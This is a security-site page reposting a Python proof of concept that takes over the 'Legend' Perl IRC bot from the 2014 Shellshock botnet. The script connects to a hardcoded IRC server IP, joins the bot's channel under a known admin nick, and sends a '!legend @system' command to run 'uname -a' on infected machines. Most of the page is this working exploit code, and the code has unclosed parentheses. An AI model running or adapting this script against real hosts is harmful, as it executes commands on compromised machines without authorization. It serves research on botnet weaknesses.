首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Legend Perl IRC Bot Remote Code Execution Exlpoit
来源:@shipcod3 作者:JayTurla 发布时间:2015-04-28  
#
# legend_rce.py
# Legend Perl IRC Bot Remote Code Execution PoC
# author: Jay Turla ( @shipcod3 )
# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. 
# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
# greetz to ROOTCON (rootcon.org) goons
#
  
import socket
import sys
  
def usage():
     print("USAGE: python legend_rce.py nick")
     print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
       
def main(argv):
      
    if len(argv) < 2:
        return usage()
  
    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the Legend Bot
    server = "80.246.50.71" #irc server
    channel = "#Apache" #channel where the bot is located
  
    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot
  
    while 1:    #puts it in a loop
        text=irc.recv(2040#receive the text
        print text   #print text to console
  
        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send ("QUIT\r\n"
            sys.exit()
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
            sys.exit()
  
if __name__ == "__main__":
    main(sys.argv)
  
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MiniUPnPd 1.0 - Stack Overflow
·Encaps PHP/Flash Gallery 2.3.2
·UniPDF Version 1.2 - 'xml' Buf
·VideoSpirit Pro 1.91 Buffer Ov
·Free MP3 CD Ripper 2.6 2.8 (.w
·i.FTP 2.21 SEH Overflow Crash
·OTRS < 3.1.x & < 3.2.x & < 3.3
·Ninja Privilege Escalation Det
·WordPress WPshop eCommerce 1.3
·iTunes 10.6.1.7 - '.PLS' Title
·WordPress InBoundio Marketing
·Wireshark 1.12.4 - Memory Corr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved